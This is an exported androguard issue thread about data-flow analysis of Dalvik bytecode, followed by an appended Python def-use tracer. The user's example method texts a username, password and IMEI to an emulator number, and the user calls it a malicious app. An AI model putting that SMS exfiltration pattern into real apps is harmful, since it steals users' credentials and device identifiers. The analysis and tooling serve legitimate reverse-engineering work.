krnbwj / androguard

Automatically exported from code.google.com/p/androguard
Apache License 2.0

Method input parameters are not being used properly #127

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago
What steps will reproduce the problem?
1.
2.
3.

What is the expected output? What do you see instead?

What version of the product are you using? On what operating system?

Please provide any additional information below.

* Function call in the source code:

String message = "User: " + user.getUsername () + " + Pwd: " + obfPwd + " + Imei = " + imei;

sendsms("5556", message, "", context);

* Function definition in the source code:

public void sendsms(String paramString1, String paramString2, String paramString3, Context paramContext)
{
    SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, PendingIntent.getBroadcast(paramContext, 0, new Intent("SMS_SENT"), 0), PendingIntent.getBroadcast(paramContext, 0, new Intent("SMS_DELIVERED"), 0));
}

* And the output generated with androGuard is:

Ledu/uta/testmaliciousactivity/MainActivity; sendsms (Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/content/Context;)V
     sendsms-BB@0x0 0 44 [ NEXT =   ] [ PREV =   ]
         0 const/4 v5, 0
         2 invoke-static Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
         8 move-result-object v0
         a const/4 v2, 0
         c new-instance v1, Landroid/content/Intent;
         10 const-string v3, 'SMS_SENT'
         14 invoke-direct v1, v3, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
         1a invoke-static v10, v5, v1, v5, Landroid/app/PendingIntent;->getBroadcast(Landroid/content/Context; I Landroid/content/Intent; I)Landroid/app/PendingIntent;
         20 move-result-object v4
         22 new-instance v1, Landroid/content/Intent;
         26 const-string v3, 'SMS_DELIVERED'
         2a invoke-direct v1, v3, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
         30 invoke-static v10, v5, v1, v5, Landroid/app/PendingIntent;->getBroadcast(Landroid/content/Context; I Landroid/content/Intent; I)Landroid/app/PendingIntent;
         36 move-result-object v5
         38 move-object v1, v7
         3a move-object v3, v8
         3c invoke-virtual/range v0 ... v5, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V
         42 return-void 

* All the registers (from v1 to v5) get their values inside the function, but the sendTextMessage() method call is supposed to take the input parameters of sendsms() as arguments. Can someone please explain it? Please don't focus on what the code does. I am trying to develop a malicious app.

Original issue reported on code.google.com by Mohsinj...@gmail.com on 7 Jul 2013 at 7:54

GoogleCodeExporter commented 8 years ago

Original comment by anthony....@gmail.com on 8 Jul 2013 at 7:15

GoogleCodeExporter commented 8 years ago
Please spend your time to do useful things.

Original comment by anthony....@gmail.com on 8 Jul 2013 at 7:26

GoogleCodeExporter commented 8 years ago
I am sorry, if I couldn't explain it properly before.

3c invoke-virtual/range v0 ... v5, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V

The above function call uses registers v1-v5 for sendTextMessage(), and the values for the first three registers (v1-v3) were supposed to come directly from the sendsms() input parameters, as you can see in the Java code too. But the values for v1, v2 and v3 are being reset at addresses c, a and 14 respectively before being used in sendTextMessage(), which ideally should probably not happen.

I have to do data flow analysis. I would really appreciate your help in this matter. Thanks.

Original comment by Mohsinj...@gmail.com on 8 Jul 2013 at 4:37

GoogleCodeExporter commented 8 years ago
P.S.

I used a customized script with default settings to generate an intra-procedural graph for an Android app.

I am using this code (http://code.google.com/p/androguard/wiki/RE#CFG) to 
generate basic blocks for each method.

Original comment by Mohsinj...@gmail.com on 8 Jul 2013 at 4:43
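Added example (editor's code, not from the thread and not part of androguard): a straight-line def-use trace over the basic-block dump quoted in the issue, resolving each argument register of the sendTextMessage() call at offset 3c back to its origin (a parameter register, a constant, or the result of an earlier invoke), and listing which parameters the block never reads. It relies on the Dalvik calling convention that a method's incoming arguments, including the implicit this, occupy the last ins_size of its registers_size registers. Two values are assumptions rather than facts read from the dex: registers_size = 11 is inferred from v10 being passed where a Context is expected at offset 1a, and the parameter names are taken from the Java source posted above. The parser handles only the opcodes that appear in this block; anything else raises.

```python
import re

# Constructed input: the androguard basic-block dump quoted in the issue, verbatim.
LISTING = """
0 const/4 v5, 0
2 invoke-static Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
8 move-result-object v0
a const/4 v2, 0
c new-instance v1, Landroid/content/Intent;
10 const-string v3, 'SMS_SENT'
14 invoke-direct v1, v3, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
1a invoke-static v10, v5, v1, v5, Landroid/app/PendingIntent;->getBroadcast(Landroid/content/Context; I Landroid/content/Intent; I)Landroid/app/PendingIntent;
20 move-result-object v4
22 new-instance v1, Landroid/content/Intent;
26 const-string v3, 'SMS_DELIVERED'
2a invoke-direct v1, v3, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
30 invoke-static v10, v5, v1, v5, Landroid/app/PendingIntent;->getBroadcast(Landroid/content/Context; I Landroid/content/Intent; I)Landroid/app/PendingIntent;
36 move-result-object v5
38 move-object v1, v7
3a move-object v3, v8
3c invoke-virtual/range v0 ... v5, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V
42 return-void
"""

# Parameter names come from the Java source in the issue; 'this' is the implicit
# first argument of a non-static method. REGISTERS_SIZE = 11 is an assumption
# inferred from the dump (v10 is used as the Context argument and the last
# incoming argument always sits in the highest register), not read from the dex.
PARAM_NAMES = ["this", "paramString1", "paramString2", "paramString3", "paramContext"]
REGISTERS_SIZE = 11


def param_registers(registers_size, param_names):
    """Dalvik calling convention: the ins_size incoming arguments occupy the last
    ins_size registers, v(registers_size - ins_size) .. v(registers_size - 1)."""
    first = registers_size - len(param_names)
    return {f"v{first + i}": name for i, name in enumerate(param_names)}


def parse_listing(text):
    """Yield (offset, mnemonic, operand string) per line; offsets are hex."""
    insns = []
    for line in text.strip().splitlines():
        parts = line.split(None, 2)
        insns.append((int(parts[0], 16), parts[1], parts[2] if len(parts) > 2 else ""))
    return insns


def trace_block(insns, params):
    """Straight-line def-use trace over one basic block. Returns the register
    state at the end, every call with the symbolic origin of each argument
    register at that call site, and the set of registers ever read."""
    regs = {reg: f"param {name}" for reg, name in params.items()}
    read, calls, last_call = set(), [], None
    for off, name, ops in insns:
        if name.startswith("invoke"):
            if "/range" in name:
                m = re.match(r"v(\d+) \.\.\. v(\d+), (.*)", ops)
                args = [f"v{i}" for i in range(int(m.group(1)), int(m.group(2)) + 1)]
                target = m.group(3)
            else:
                *args, target = [s.strip() for s in ops.split(",")]
            read.update(args)
            calls.append((off, target, [(a, regs.get(a, "undefined")) for a in args]))
            last_call = (off, target)
        elif name.startswith("const-string"):
            reg, lit = ops.split(", ", 1)
            regs[reg] = f"string {lit}"
        elif name.startswith("const"):
            reg, lit = ops.split(", ", 1)
            regs[reg] = f"const {lit}"
        elif name == "new-instance":
            reg, typ = ops.split(", ", 1)
            regs[reg] = f"new {typ}"
        elif name.startswith("move-result"):
            call_off, target = last_call
            short = target.split("->")[1].split("(")[0]
            regs[ops.strip()] = f"result of {short}@{call_off:#x}"
        elif name.startswith("move"):
            dst, src = [s.strip() for s in ops.split(",")]
            read.add(src)
            regs[dst] = regs.get(src, "undefined")
        elif name.startswith("return"):
            break
        else:
            raise ValueError(f"unhandled opcode {name} at {off:#x}")
    return regs, calls, read


def analyze(text=LISTING, registers_size=REGISTERS_SIZE, param_names=PARAM_NAMES):
    params = param_registers(registers_size, param_names)
    regs, calls, read = trace_block(parse_listing(text), params)
    return {
        "params": params,
        "final_call": calls[-1],  # the sendTextMessage() call in this block
        "unused_params": [n for r, n in params.items() if r not in read],
    }


if __name__ == "__main__":
    result = analyze()
    off, target, args = result["final_call"]
    print(f"{off:#x} {target.split('->')[1].split('(')[0]}")
    for reg, origin in args:
        print(f"  {reg} <- {origin}")
    print("parameters never read:", result["unused_params"])
```

Run as a script it prints the origin of v0 through v5 as they stand at offset 3c. For a real APK the same trace would take registers_size and ins_size from the method's code item instead of the constants above, and a block with branches needs a proper reaching-definitions pass over androguard's basic-block graph rather than this single straight-line walk.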